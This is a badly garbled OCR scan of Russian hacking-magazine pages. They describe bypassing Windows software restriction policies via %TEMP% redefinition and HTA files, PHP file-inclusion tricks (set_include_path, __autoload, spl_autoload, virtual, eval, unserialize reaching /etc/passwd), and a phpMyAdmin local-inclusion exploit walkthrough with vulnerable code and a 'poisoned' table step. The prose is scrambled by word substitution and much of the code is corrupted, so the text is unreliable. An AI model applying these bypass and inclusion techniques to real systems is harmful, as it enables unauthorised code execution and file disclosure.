проблема. У пользователя, разве их без послаблений безвыгодный прищучить, поглощать воз­

вами. Но политики н а запущенную программку сейчас далеко не будут действо­

можность их переопределять. Указал, как например , админ , аюшки? с п апки

вать! См . рисунок.

ме нны е среды во качестве путей пользу кого ограничений

%ТЕМР % не грех засовывать ехе" шни ки, а Юзеф ер взял несомненно равно переопределил

На нем юзер test_gpoЗ отнюдь не может пустить гegedit за

политик. Н о, ради п устив лещадь test _ gpo2 всякий ехе"шник !диспетчер задач

следующей командой :

наприм ер), возлюбленный уж вничью никак не ограничен да позтому может включить

Set

гeg edit. Кроме того , есть ли у нас очищать шанс удале нного входа во

ТЕМР С:\

систему !по ROP, например) , так я можем прочертить аналогический финт,
И воттак без затей получил достижимость засовывать файлы изо корня С: .
Крометог~нестоитзабыватьпрос тандартныедире ктории,изкоторых

только исключительно со одной учеткой !демонс трацию можешь поглядеть на этом
видео- Ьit . ly/pXsBj 0) .

разрешен запускание ехе-файлов:

lPIOKB. ВСПОМИНАЕМ ПРО НТА
• %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\SystemRoot%
• %HKEY_LPCAL_MдCHINE ~SO FTWARE \Microsoft~Wi ndowsJf["l., _ _ __
CurrentVersion\SystemRoot%*.exe
• %HKEY_LOCAL_MACНINE\SOFTWARE\Microsoft~Windows NT ~·---­
CurrentVersion\SystemRoot%System32\*.exe
• %HKEY_LOCAL_MACHINE \SOFTWARE\Microsoft\Windows\
CurrentVersion\ProgramFilesOir%
Они разрешают запускание ПОтоль ка изо папки

Windows равно Ргоgгаm

Files к пользователей . У обычного пользователя отнюдь не т внутренние резервы

Последний хинткасается неофициальны хисключений,накоторыене

д ействуютгрупповые политики. Вадиме Подане написал на благе от­
личную серию постов, посвещенных SRР-политикам. В частности, некто
обнаружил будь здоров путьдля их обхода равно из-за п уска произвольнаго стих

lgoo.gi/BmBsm ) от использованием приложения НТА IHTMLApplication).
Итак,последовательностьдействий:

0.

Создаем файлик вместе с приблизительно таким текстом :

gjTML >
<scriRt lang@ge;" v bscript" >_ __
~gbox "I"m dang..,
eL
ro
""u""s"-"
v""
в_,c."o,..,d,.,e"-!"-"
! !_" _ _ _ _ _ _ _ _ __
~/s cript >_ _
</HTML>
0. Сохраняем его из ра сширением .hta !например , execute_this.hta).
0. Создаем фирма чтобы него .
0. Открываем ссылку - равным образом hta запускается .
Над в отношении ли говорить, аюшки? заместо вызова безобидного MessageBox "a
VВ-код может произвести на системе аюшки? угодно? П по части литики

SRP долж-

ны контролировать огульно шифр , ко торый может исполняться, во томище числе равным образом

всевозможныескрипты.Однакоиз-затонкостейработыгрупповых
политикд анный патрулирование работает. К аналогичным « глюковатым •• рас­
ширениям вдобавок НТА Вадиме относит

REG, MSC, НТА , СНМ. Точно

приблизительно а наворот наблюдается равным образом вместе с соm;файлами lв томишко чи сле всякими
олдскульными ДОСевекими программами, которые целое до этих пор разброса­

ны на п апке винды). Они отнюдь не у читывают правил а гр упповых государственный деятель , этак
что работают во виртуальной машине
------~·""

005 .

.__..

~"

c : \GpDisaЫe . exe

c:\GpO -:.ы..ехе

Как твоя милость можешь заметить, всевозможныхлазеек полно. Их разнообра­

Windows connot open this pr~om Ьecouse t hos Ьееn prevented Ьу 0 softW41"e restriction polcy. For
Event- or cont«t ywr system ~rlltor.

ок

0

зие равным образом ухищре ния никак не могут неграмотный изумление . То, что-нибудь ваш покорнейший слуга скажу дальш е, может

тебя удивить . Даже в соответствии с вместе с ле перечисления всех сих способов в целях обхода
ограничений мы совершенно а безотлагательно рекомендую неграмотный пр енебрегать их
использованием. К тому а об эту пору твоя милость можешь учи тывать вероятность

применения сих лазеек равно со куда большей вероятностью настроить
Обход от перемена переменной окружения

ХАКЕР

00 /153/2 011

систему, которая короче будет защищена. ::J:

069

хакинг

PrOxorKotov lhttps://rdot.org/forum/1

ЬIСЯЧа

И ОДИН
инкл ;ц
разведка

УЯЗВИМОСТЕЙ
КЛАССА LOCAL/

REMOTEFILE
INCLUDEHA
НОВОМ УРОВНЕ

• www.php.net/
set inc!ude path
оnисаниефункции

set_include_pathll;
• www.php.net/
.l!fi.Ш.ig)jn ­
оnисаниефункции

unserializell;
• www.php net/
:tir.l!!.i1 -onиcaниe
фyнкцииvirtual!l ;

• www ohp net/
~ -оnисание
метода
autoload;

• ь;цy/nWvefG

положение в форуме.п!21.

Первое , держи что-нибудь бы пишущий эти строки хо тел устремить уважение , сие деятельность

set_

ш:g, посвященная

include_path(), которая устанавливает дир ектории на

магическим методам

директивуinсludе_раthидаетвозможно из тьманипуляцииработой

__ autoload во част­
ности ;

инклуда на

операторов include(_once)/require(_once). Такая микроманипуляция ста­

Широко известно, ась? причиной

• bjЦy/odY5zS

новится возможной на из лучае , разве на РНР-сценарии безвыгодный задан нерушимый

-немного оборона

тракт для nодключаемому файлу, ведь принимать раньше требуемый обложка ищется во

возникновенияуязвимастей

• www.ohomyadrnjn.

класса LFI/RFI во РНР-движках
служит вероятность передачи

spl_autoloadll;
оо-официальный
сайт phpMyдdmin;

• Ьit )y/nV1 njG

нераздельно

изо LFI-эксnлойтов

АЛЯ phpMyдdmin"a.

произвольныхданных на операто­

п у тя х изо

include_path, а затем- на рабочей директории скри п та.

Тем самым, кабы наш брат сможем передатьсвои nроизвольныеданные

во set_include_path [или во ini_set("include_pat h", [данные] !. что такое?
аналогично, ведь легко и просто изменим эффект работы

include.

Для nримерадавай возьмем абстракт ны й адрес РНР-приложения, во
одном с скриптов которого автор сих строк нашли следующее интересное место:

ры include[_once] равно require(_once].
set_include_gat h(.$path . PATH_SEPARATOR . get_include_Rath().);

На самом деле введение

i nclцQ_e _: :myЦ~php_:"_; ______________________ . _____ _

файлов для РНР-сценарию позволяется
0

0

исполнить равно множеством дру­
На нашем дискеты

гих, поменьше известных способов,

сможешьнайти под­

об эксплуации которых равно пойдет

видео ко во всех отношениях

голос во этой статье.

070

робноеобучающее

Д оnустим, что-то во данном из крипте я можем сказываться для переменную

$path. Например, симпатия берется с базы данны х, на ко тор ую у нас принимать до­
ступ, alias но ее позволительно где раки зимуют на админ-панели приложения, во которую

да мы не без; тобой в свою очередь можем п подняться . В общем , вариантов существует великое

описанным во статье

множество. Легко понять, зачем таким образом наша сестра сможем проинкл рыбачить

методам инклуда .

обложка

myclass. php

изо кто хочешь директории.

ХАКЕР

00/153/2011

Тысяча да сам объединение себе инклуд

Конечно, хозяйка по части себя круг обязанностей

set_include_path(), которая при­

нимает произвольные пользовательские причина , малограмотный является экой
у ж сильной угрозой безопасности , да разве во книжка ж е nриложении предисловий

-. ..,

обнаружится ранимость будто << file manipulatioп >> !то питаться я можем

W. f..Jf iS1"D t"IIIJI! ,

создаватьфайлы не без; прои звольным именем!, ведь тутуже основательно возмо­

•P l _ ... ~ol o ...
jPIU" S >• 0. 0 .l)

жен нижеприведённый п оворот событий :

0. Создаем во /tmp обложка со именем myclass.php !nрава доступа сверху эту
директорию в большинстве случаев

0771.

ТЪ ~• t ww:цo 01 t•
.., ,

t nt.e -CI t.o Ь. ... ~ ,.. • Mt • IIJt. UJPI -11 ~81.1 o10 tor _ • uwlo.c! IJ. lt I>OC.I>IDO • • "

..,.:- C ir iC Ь.IItll 0 0f \l... t.IOJ188IIIh

U.Н II

to r

an y

l 0 tc r

t • " """ """"" anct 0\l ~olo.od_reol •r•r o

c • I110_8 08 C O I IКd /l.

0. Устанавливаем $path=/tmp/.
0. Обращаемсяк не без; крипту, во котором естьуказанный ранее код, равным образом на­
блюдаем небезуспешный инклуд файла myclass.php иэ директории /tmp .
ep l_euto l o8<1 0J .,pllp811t ·

0/ php_e pl . e

Ты , натурально же, спросишь, если бы у нас принимать способ создания

~II P_r tж TIOII(8pl_ •ut.olo 0od )

произвольнаго файла получай сервере, в таком случае к чему сызнова создавать всегда сии

a h•r " 0" 01188. , 0 011_" _ , "HI•. • • c• • 0"L. <i[ 0181 0 I O-.d_. ~ ИN IO III ) 0
l nc.o i . . • . -.I •D,HI•.••r.e.le n•B•L.<iC a .... o l o.d_e• t.• ,.. ,o,.._le n),toulld • OJ

<< лишние » действия.

c tu.r •oopy, • po•t , " 010111

Здесь кушать единственный видный момент: этак на правах наш брат расматриваем

у язвимости прямо РНР-скриптов , ведь отнюдь не есть смысл не вспоминать , сколько держи

Описание <<Н ОВОЙ» инклуд-функции spl_autoloadll для сайте китайских хакеров 00vul.com

подавляющем большинстве веб-серверов РНР из-за п уще н как бы часть
Апача равно тем самым безграмотный обладает какими-либо особенными правами ,

function __ autoload($class_name)

сверх того www/пobody/apache. Чтобы расплетший незащищенность вроде << file

{ -

manipulation », пишущий сии строки

include $class_name;

должны разработать обложка на корневой директории

на е ба, нотам в корне может равным образом безграмотный взяться каталога, достуnного получи после nи сь

}

____

средствами РНР. _

set_include_path($path. PATH_SEPARATOR . get_include_path());

АОБЪЕКТОВ
Следующий видный ме х анизм, какой вдобавок nозволяет маниnули­

$cookie=unserialize($_(OOKIE[ "auth" ]);

роватьданными на конструкциях include(_once)/require(_once), сие
возможностьавтоматическойзагрузки объектов .

Далее паки предnоложим , который пишущий сии строки можем внушать сверху переменн у ю

чать файлы не без; описанием классов безотчетно не принимая во внимание использования

$path. Тогда , з адав $path равным <</etc/» равным образом nо не без; лав на кукахзначение
auth равным << 0:7:"hosts":e:{}», наш брат вnолне сможем проинклудить
обложка <</etc/hosts». Д анный действительно по отношению nи митрополит никак не лишь только на официальной до­

include на явном виде .

ку цемент а ции РНР, такж е отдельные люди nримеры дозволено выкопать равно во по отношению б суж де­

Широко бесспорно , что-то на РНР>=

0.1.2 да раньше была реализована
удобная << магическая » связка __ autoload, nозволяющая подклю­

Если превратиться для официальной документации , ведь наше заинтересованность

вnолнеможетnривлечьтакоезам е чаниеотразработчиковРНР :

ния х держи фор у м е гdot . oгg !с со ылк у ищи на справка х!. Говоря об __ autoload,
не позволяется никак не отметить равным образом об что-то около называемы х SР L-функциях, пример

sрl_аutоlоа~котораяимеетдовольнозабавнуюнедокументирован­

If_the class name is used e.g. in call_user_func()
then it сопение contain some dangerous characters such as .. /.
It is recommended to not use the user-input in such functions
or_at least verify the input in __ autoload().
Данное заметка означаеттот факт, что-нибудь ежели пишущий сии строки можем щекотать сверху

н у ю возможность, описанную снова во

0009 г. для сайте китайских хакеров

BOvul.com:
<?php spl_autoload(" info", " .txt " ); ?>
Данный прогноз вполнеуспешно выnолнит шифр с файла

info.t xt.

мера функций , оперирующих названиями классов, в таком случае стано­

вятся возможными уязвимости будто LFI/RFI. Например, воттакой адрес
кардинально согласен ет достижимость проинклудить обложка

/etc/passwd:

IRTUAL:HAЯ РЕАЛЬНОСТ
Еще одна РНР-функция, которая nозволяет<<nроинклудить» файл, сие

v iгtualll . На самом деле возлюбленная страшно отличается ото вышеnеречисленных
конструкций , таккакееиспользование э квивалентно<!··# inсludе

function _a utoload($cla ss._name) { _
__r::g_quire_once $J;.lass_o_~@p " ; __
}

____

virtual ... ··>в mod_include, в таком случае лакомиться возлюбленная

-·--------·-··--·-·------·-··-··---·

call_user_func(array( " •• / •. /_,_,./etc/passwd".e", "test" ));

не без; криптов , shtml-фaйлoв равно не выделяя частностей итого , почто дозволено отпахать от

Apache . С
Ко н ечно же,

call_user_func()

безвыгодный единственная занятие , которая

сумме как только выполняет под­

запросдрасhе. Используетсяданная функциядля n одключения СG I­
РНР-файлами сия выражение равным образом работает вnолне сносно.

Если у нас для сервере убирать воттакой вместе с криnт :

nолучает во качест ве параметра наименование класса сиречь обьекта. К числутаких
функций как и с н осится равным образом многострадальная

unserialize(), nричем

<?p hl) virtual(" info.php " ); ?>
- .__ _ _ _ _ _ _

nользовательские материал nоnадают во эту функцию куда как чаще , нежели
во

call_user_func() .
Однако тогда питаться равно кое-какие ограничения . При десериализации

...то nри обращении для этому скрипту на браузер попадет плод
info.php.

выnолнения файла nод названием

объекта слово клас из а проверяет со моя особа получай валидность, таким образом,
да мы вместе с тобой малограмотный сможем nротолкнуть на имени объекта несколько слыхать << •. / .. / .. /etc/
passwd». Тем никак не меньше у нас в полном смысле слова nолучится проинклудить обложка изо
того а каталога, гд е в х оди тся равным образом выше- скриnт .

Если сообразоваться всё написанное превыше объединение поводу функции set_include_
path(), в таком случае становится возможным инклудлюбых файлов с произвольный
директории.

Представим , что-нибудь нужное нам веб-приложение заключает отсадка __
autoload, функцию set_include_path() равно функцию unserialize():

ХАКЕР

00 / 053/2011

GOOGLECODESEARCH
Для nовышения своего левела ба го коnателя со оветую залететь для

google. c om/codeseaгch , подобрать во качестве языкадля поиска lang:лphp$
равно порыскать на движкахописанные на статье опасные конструкции :

set_
include_path(), _autoload, spl_autoload(), virtual() равно unserialize().

071

хакинг

_$.this- >- errQ.C_~_o nfig

01 ·

W l •c.ol ~ 081 ) 01 ~ltoley_..,:J

что касается

g ..,_. . -•

.::!-c:::.~..."!!.:~.ю~~~:-..::..."l~o«..-!.o"::t,LOZ.:",_,gь_s;;;;;:oe""yc~
..---..._.,,a-..ot"..,..,.,......
.......

Дан·ный коддает допустимость корректной обработки ошибки

,_.,,....._.~-"""" " 0S·S)-&.IAII~..,_ •.,,e.-o:;-.-4t11"4Soo.ro:•-"""""""~ttr " I .6563!Тiys-o / illod.........,~ ... ,.,·~-К63310r1tм
...,.., .,,.....,~i"""" · 0 •эc.-•,.-

-.-·~-·8"e-s..o.yo~~tN.,..-...o,.>...."

.. ,_,".,,,.,м..,p.,...-............,.м~-..

муть си нга конфига [написанном для РНР) во случае его нессторожной

... ShoiDн ...... ~y"...,_.,._.....,..P .• 05:2!i:S..._.s.ьm.. ..... u..r"*"•~....,....Ju<rh~.......,..xa~o.wv...~ ..... /lnJio..."

tolld":U.n.Sк

.......

"""""""- ":53:S38n1Sondl>t"lrlloo<lo.............,,..,.r·.Q6:"Pк~ocf,. .. ,._",.,_,.,,.,..,..~~~~..J*td " ~:6ol~,_..,-~,-""":"i<I"""""

*" " Иfi1Sdr"p

модификации кем-либо.

,...".,,._.""""IJ~--"- IS6661JUCP~o•Joodopoolд.oocpj;ll.t.loc:Nul\oc_...,к/uoc,.,....,..,., .• 08 .6.Pott01koo-t.--mttfllll.todt~-·,ID_IЭQWO"IIWodtWM
o..м.-.,, , ..,._
.fМЭ,I~~QМUft1."->Ьit~<I
"TIXI1.0Uиrlo.-..ra .-~,~..,oql-"811 .811111j-SQ..~-•it1ttltJ~

............ _"".
..
..
=.:-,::с~:"-~"7с::==~оо:~~~~=~~-~~"":9";--~~~~~~·~~~..:;::.·~в::..~
S\lpoNotl. hOOI-tl\d-" l l o--(J/...anytyOIOM(IoiO<MioO "hOOifUtl/tЬot\/JooiOtlnaptt11111t" L 0.6Syt l tm L I .....-......,..IIIo\:" )"71!10цoiooC-...0Soщ8lfU4r/t~

.

То вкушать когда конфиг отметина полноте довольствовать ошибки, в таком случае сверху удивительно ран

ny " I &БSllflySOIIdЬooJ.Л.~~oJntm"56!633~s..dDoo:lluod~t- - " 01З.Goont op-:N""-•"""~-:·e.t-Sua!Jti-.IJ\ftll~

выведет ся ко расиво оформленное сооб щение вида

<<phpMyAdmin was
to read your configuration file! » где бы << Parse error»,
которое бы появилось возле использовании in clu de"a.

...."•ttloliall r.l onPotttм."otiO<oi-·Л.odo............, o ol>d." "2222 . So<: .. o ~OOI,__, ,.,~..,.,_чo. " 05. 01!5-.;ls.-....,uo .. .-o ,.olldt~ANdl~
........ ".161EiS...._.Oof,.. IJifl_,....r~·Лжlo~- · SЭS.JIIilociS-~I.Amfo~"""o"J".6262.P""kfl,illtrPff-\lllf~01.,.Aiottlo....",...,..,.}llo<rt"Ь. .&ol .. . .
,......._l<wlo.... r."-lo.............,_hp . " ИI!I!i41o<,,..... _ _ ..",.1J\III/......... IIIiЦI"Ii61i6WCP,......,_uotrМdo,...,_~ 0\11111oc o i"IЬI•odwo:~ l fi"OII . " 015.0Pa.,~o

unaЬle

===~~~~:=·=-";;~~...=::"-""~~~·~~~-:;"":"~~.~-:~.
"
.............
...........
--f"i1t ." IOO<IIIXXI.IU01W~

l

file - false;_____________

_ $.t_his- > sg_u_r_~_mtimg=fiJ.emt.:lm~.CH..hi..~>-gg:!;$.QJJ_r_<;g_{).).;
_ }

-tl~-.lrlld~IIIIS-Iro51.11tll.-~lldJoi

:.~?""",..,o.ooкn.•.,.,•••OOO""""

0

( I - " " " (( ....

._...,.....(( Pi P-. ". )(06мoo"""l

HPMYADMIN
Теперь , потом того наравне твоя милость намотал всё вышеописанное сверху ус, ну-кась

I

@Co<poщ•-•~-"-•lal"louJo"" fмo-••PUI .... J""" I ~OI-1

Q

Qn..w... III,.08ta.~.... "-< _
~аn..-о

•Т •
об

.;

m..- or

.....".,...,_111 ...,.".tto\JMJO

х

0

t.._ Оо ........ ои / с..ю..

"

Q~r)poo6.pom-

tollllltlal . o•...,r.o., .м

,.~.,

.....- с-- /

.."...•...._,.,., ,_, ,1 .......,.• ..._......,_,,
lll!p~···· ""ff

Х

nродолжим начатую во прошлом номере журнала тем у потрошения

0

_.. _, , ,.... , нех,к,. что касается ,..

ом.оl мо

-:\~~~

.--_о~.,,_.....

!!11.(17~03" 0 028

phpM yAdmi n"a . Как твоя милость поуже помнишь, во июле сего лета на phpMyAdmin "e

==
от -•

нашли целую плеяд у багов, а как и несписанные на Н неудовлетворительно порядком

....оо•

интересных инклуда. В паблике в мгновение написания статьи инфор­
мации в отношении ни х возьми хо дилосьдовольно мало, приводились чуть куски у яз­

"

"

вимого кода, что, конечно, безграмотный раскрывает всей сути сих уязвимостей,
в соответствии с этому нуте рассмотрим равно х поближе.

LFI на phpMyдdmin"e на файле sql.php

Такж е отмечу, аюшки?

virtual

да

Итак , первым по части списку отлично местный инклуд во файле ./
libraries /d isplay _tЬl.lib.php. Уязвимы безвыездно версии phpMyAdmin"a
вплоть перед 0.3.1 0.1 включительно равным образом вплоть до 0.4.3 включительно .

spl_autoload - сие пользовательские

функции, т ем самым их не возбраняется эксплуатнуть на качестве callback"oв .

Информацию об этом инклуде не запрещается встретить получай официальном сайт е

оживка во разделе Secuгity IPMASA-2011-8) .

Например, viг tual дозволяется вызватьдинамически со ледующим образом:

.s ~IШR-----·--·---. ·-·--------·--..-·- --------·-----· . . ·-·-.. .--..-----·-.$~Jl1-=-". vir_t ual" ; ___ ·········---·-····-·------..--..--....................
$path( "myclass.php" );
?>

--Прочитав a d v isoг y, ну-кась взглянем получи и распишись патч, предлагаемый разраб в рассуждении т­

чиками про ветки 0.3.х [вообще присматривать из-за патчами разработчиков
во всякое время будет отсюда поподробней , что-то около в духе в дальнейшем завсегда позволяется откопать мол ся тки

малоизвестных равным образом еще пофиксенных зеродеев).
Сам патч выглядитпримерно так:

... либо — либо послать как бы параметр во call_user_func() :

,L).j,J!.r11.r::ie~l!:t~iR.:I..<~y_tQJ._,:J,:i,!! ,RhiL(PllRМYAd.miD_3.,,3 .lQ)_______
Jf ($GLOBALS[ " cfg8~:J.atiO_Гl] [".m.:im.gWQГ..is ] ________ _

0L .· -···-·-···--··-----h~l_user_func( "virtuaJ

", "myclass. php" );

&& $GLOBALS[ "cfg" ][ "BrowseMIME" ]) {
if (isset($GLOBALS[ " mime_map " ][$meta- >name][ "mimetype" ])

?>

) {

EVAL==EVIL
: H_f1~1.цgg_ij,:J,g_:"_ $(J_lQ~.8lS.Cm:\..r!l_g_ПJAP "J[$.mg:t:A.:2DiJ.!Il_g] ________

Ещ е одна важная конструкция, которая позволяет претворить адрес с

указа нного файла, сие

__[:tпшforJn<!:t:!oD..".1_______ ______________ _ __________ __

eval(" ?>" . trim(file_get_contents(" info .t xt" ))).

±i:iщ:Jude fi.le=Pм.A_iecш_gJ"_a.t:.Ь..($GLQ!"!дL$[mJm_g_mщ:э. :J[$m.gta- > OEm!:!]_

В nринципе , возлюбленная даеттот а самый р езультат, почто равно использо­

вание include/гequiгe, хотя подле этом существуют некоторы е нюансы.

[" traпsformatioo "J);

Во-первых, возлюбленная никак не оптимизируется акселераторами, тем самовластно ым близ
адски частом исnользовании данной конструкции могут взору

проблемы вместе с быстродействием. Во-вторы х, получи file_get_contents() во
eval() малограмотный действ ует распоряжение allow_url_include, тем самым, сделал ли
allow_url_fopen=On [данная опция объединение дефолту имеет именнотакое

значение), ты да я совсем сможем nодключить выкачанный файл.

-·""•-•"" \ji"""""!>ortuowu "" CI

Кстати, собственно данный бездействие бесспорно равным образом дает изумительный змож так от ть таково ради от в таком случае

добить со ваш покорнейший слуга выполнения заключение во известном эксплойте << phpMyAdmin <=

0.1 0.9 unserialize() arbltrary РНР code execution exploit >> [ Ьit . ly/qW 04f 0 ) .
Итиль зрабо тчики phpMyAdmin "a п осле выхода данной уязвимости на
паблик убра ли с стих своего блик лишь только что опас н ую функцию

unserialize(), оставив около э томишко безвыгодный поменьше оnасный путь load во классе
PMA_Con fig сверх изменений. Причина сего непотребства кроется на
следующем куске заключение изо метода load:

-

· ~.........
. .....

- ~~-

·-·

Autolo•dinv Cl•••••
dw~ •rnln9o0Je<!-<~<1lf"lted ~IIOnf

-..

t;n•tt

anti"НPIIOU"ot

No

r--dиt <kflмlon .

on.

or u-o.~t.....,..~...cn

tS

0"1.1~

to

• wnt~ ~ 0ot>Q " " ot "«Oed lndo.IOe$ •t ~ ~ornno of tiO"I ~~ (orw: for tW"I dns).
Jni"НPS,Ihis~no~nкtп.-y . YouiNVCМI"nt..-._O<Jtolol(ll"l..nl;t\Onwhkh~

.... -~yцltcii"I(.IISI"f(IUirf\J"o"W"9ШUSfl

=:,s~=..(-..tw;htцosn"tt>«nckr..edver.ev~tl"li:sf\пctiQntheseф~fflQitlalsototnllastcNnc.ttokжlthedasЬt~PНP f/lls

• OI>JO<I1--

~ ~;~o.--

............

o OI>,..,I......,..,..
,.~

n.r-

PnortoS. 0 .0,tx cepliorlstt-n:.wnl"ltht_.utolo«<~<»uudr>OtЬtC11141t .,lhe i:AUll block.-.:lwoulcl~l"lthlt.lltm11". 0"rem

S.3 .0+ txoeQUQt\S tl"lro:>•l"l n U"W:_~ ~<:«1 Ье t81.."Qf\tn lhe WJ.St1 Ыоdс, WRh 0 Of<IYISIМ, lf tl"lro:>llnQ 0 OJStorntXQPtiOn. I1WI
the WStOII"It1<«Pt\Ofldll"i mustЬ.tVIiLitJk- Тht _ ... 0~ ~ IП-/IV Ье \l"l~fto.n!Vtl-; 00-..~ tht QJStornUCtj)t\OfldiiИ •

.... . ..
·-• oe,...
~

-~

• otolo<I:C-._
o C-М"<"\10./0(tl

• Т•"­

$.eval_resul"~;__..=______
---····--·····--·---·-··------eval( " ?>" . trim(imj:)lode(.":.\n", file($.this- >gtl$.o urc~()))))~----------

" """"--.
...................
. оо,.

o OII;.<Ihnolo<• OOf"C~ ........ ,

lfo:hedl nl\an\e~ut~t-Q.n ~ o:t\ef"lltCIO"\COI"I~SOtl"le~CI"III"O<:terSI>.IOIИ . /. I tit r~t9notusttr.t
USotf-r(>Utoni>.IOIIUncl:lornio.-ltlt~ l "l"tflll/tht.,...tlrl

..

_ _.tOioad( ) .

,,

fur>«ior~

_..to1wd (, c1•t•....-) (

; ...._tudo; k1иo..n- . ". php " ;

if ($eval_result===false )
_____$this->error_config_file=true;_

l oЬj

.й~-------.............................................................................. ··-------------..·--..--·-·-..-·----{.
.... _,_ .................... _",_"_ .......- ......- .....- ...- -....· - - - - - -....- .....,_..
__ ___ _

__
072

____ _______
"

мw 0+,<1*>s 0();

~оЬj2 • мw ll)<1 .. o2 ();

,_,

Описание магического метода __ autoload в сайте php.net

"_"

ХАКЕР

00/153/2011

Тысяча да одинокий инклуд

">phpMyAdmin

ht!p :/•rn:Zi"IPIP/p~дdmh,/server _sql.pl-p?IDken=ЮJ5909lade746777SбdбЬ17deЗ2cЬd9

(_

tвJ самые гюпу~

0

01"1<11Ючить •

~-:"~ [Х

- Mozilla Firefox

D начапьна_я страwца

.1. Coakles •

/

<:J

-11-tf · Goo9le

• Лента новостей

оu.ибок css нет· ~ Формы· 0:.!!1 Графика· О ~· ~ Раэное • Jfl Контуры· 0!!11 Размеры· );: жструменты • ~ КОА •

0iJ настройt<и •

mlocalhost
@! Ба>ы .о.анных

.{J SQL

О Состояние

Выполнить SQL.>anpoc(ы) для сервере

{j) Переменные

0ocalhost":

ф

IИJКо.о.мровхи

i! Тиnы таблиц

Gj11 Эксnорт

G!j"! Mмnopт

i~t~ Синхрони>ироваn.

- - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - - . ,

CU.Atl TAВLJ " test " . " paatest " ( " colwm naae " IHT NOT JIULL , " aiaetype " IllT
НОТ JlULL , " tahle_naae · TIXT JlOT НULL ) -INCINI • !IYISAК ;

{ Разделитель О }

llаПроцессы

НОТ

WLL , " transtoraation·

ТIХТ НОТ

NULL , " tran.stora•tion_options " INT

НОТ

WLL • " dh_naae " TIXT

0 Покаэать отваленный заnрос опять

tJ
Создание «ядовитой >> таблицы на

phpMyAdmin
во массиве

reguire_once " .Ll ibr aries/ transfor mat i ons/ " . $include_file;_ __

званием

$_SESSION не ведь — не то долженствует бытьдоступ для базе данных перед на­
<< phpmyadmin>>(вообще буква предприятие данных может давать имя ся

равно по-другому, этак наравне ее заглавие определяется конфигурационной
Из приведенного раньше заключение становится ясно, что такое? интересах реализации

переменной отметина

данного локального инклуда необ хо димы следующие условия:

0. $GLOBALS[ "cf g" ][ " BrowseMIME " ]

==

true. Сразу скажу, чтоэтоусло­
./libraries/config .

вие общепринято хорошенького понемножку выполнено, таково на правах на файле

default.php

указанная аргумент соответственно умолчанию выставлена во

tгue. Влиять получи и распишись эту переменную да мы вместе с тобой далеко не можем . Если эреб мин сменил ее

config.d efa ult. php, равно н клуд надергать еще невыгодный удас тся .
0. Должны бытьопределены массивы $GLOBALS[ "cfgRelation"] равным образом
$GLOBALS[ " mi me_map" ]. Массив $cfgRelation играет хватит

ма ссива

$_SESSION на ф у нкции parse_str(), обнаруженная Mango,
phpMyAdmin"a, что-нибудь равным образом рассматриваемый
инклуд. Таким образом на $cfgRelation наш брат слегкостью можем запи ­
имеет луг на тех но версиях
сать нужные нам данные.

Единственное, ась? до сей времени нужно знать, сие вес переменной

роль во

важн ~ю gоль кайфовый всехуязвимостях, относительно которых пойдет речь, оттого ваш покорный слуга

$cfg[ "Servers" ][$i] [ "pmadb" ]).

Важноотметит~чтоужеизве стнаятебе перезаписьпеременны х

$GLOBALS[ "server " ]. Этапеременная определяет, не без; каким сервером
базы данных автор будетсоединяться. Обычно phpMyAdmin соединяется
от единственным сервером, равным образом значимость этой переменной хорош одинаково 0.
В коде блик предусмотрены небо и земля варианты работы со мно­

со всеми подробностями опишу, каким а образом возлюбленный формируется.

гими серверами, поэтому, с намерением аккуратно знатьзначениеэтой перемен утнапиштим ,
Итак, отваленный скопление задается функцией

PMA_getRelationsParam(),
./libraries/relation .

которая, во свою очередь, определяется во файле

намдостаточно кинуть взор получи кукисы, выставленные нам phpMyAdmiп"oм:

"pmaUser - " . $GLOBALS[ "server "] равным образом " pmaPass- " . $GLOBALS[ "server" ].

lib.php:

Идем ниже .
Массив

function PMA_getRelationsParam(.$verbose
{_

______

=

false )

$GLOBALS[ "mime_map "]

задается со через функции РМА_

getMIME():

if(empty ($_SESSION[ " relation" ] [$GLOBALS[ " server " ]] ))

./librarie~/transformations.lib.php_ _ _ _ _ _ __

{

function PMA_getMIME($db,

$_SESSION[ " relation" ] [$GLOBALS[ " server " ]]=
___ PMд __ getRelationsParam()_;,_ _ _ _ _ _ _ _ __

____________________________________

_}

_ $GLOBALS[ "cfgRelation" L=_$_SESSION[ " relation" [.$GLOBALS[ "server" ]1;_

$tаЫе,

$strict=false )

{
~~Qm_qry~-~---------------------------------------

SELECT ·column .un~am~e~-4------------------­
. mimetype~"---" transformatioп · ,

return $_SESSION[ " relation " ] [$GLOBALS[ "server" ] ];
___________________________
___

}

Если на массиве $_SESSION далеко не задан составляющая relation[$GLOBALS
[ "server" ]] , ведь дьявол задается с помощью функции РМА __
getRelationsParam. Е сли а этотэлемент зада н , в таком случае симпатия насчет сто
возвращается. Функция PMA __ getRelationsParam определяет
массив$сfgRеlаtiоn,руководствуясьзначениемпеременной

$cfg[ "Serve r s" ] [$i] [ "pmadb " ].
Если спица в колеснице этой переменной никак не задано, так целое первоначальные сведения

массива

$cfgRelation будутиметьзначения false иначе говоря null. Е сли
но аргумент $cfg[ "Servers" ][$i][ "pmadb " ] определена равно доступна
соответ вместе с твующая основа данных, ведь скопление $cfgRelation опреде­
ляется во соответствии от этой базой данны х. Таким образом, буде
наша сестра хотим засыпать во сосредоточение

$GLOBALS[ "cfgRelation" ]

нужные нам

значения, у нас должна существовать способ перезаписи переменных

ХАКЕР

00 /153/201 0

" transformation_options·
FROM " . PMA_backquote($_cfgRelatj_on["db"])"--"-- - - - " , " • РМА backguote_($J;fgRelation["column info"].),~----WHERE . db name·=:--.· " • PMA_~lдddslashe_~$db~_
· _ __
_~_.:..\: _______ _
AND ( " mimet)"pe" !=\" \ " . (!$strict ? " ___ _
OR " tra nsformation· !=\ "\"
______
OR " tra ~form a tio n_options· !=\ "\" : " ) . " )";_ _
return РМА DBI fetch result(.$com_gl"y, "column name", _ _ _ __
nuЦ,_$GLOBALS[ "controllin k" ])_;_ _ _ _ _ _ _ _ _ _ _ __

}~-----------------------------------Если автор сих строк хотим, чтоб конгломерат

$GLOBALS[ "mime_map" ]

содержал

нужные нам данные, автор сих строк должны учредить свою произвольнуютаблицу во
БД . Если буква осуществимость у нас есть, ведь топический инклуд в полном смысле слова воз­

можен . Теперь самое минута выяснить, как бы да при случае вызывается связка
PMA_displayTaЬleBody.

073

хакинг

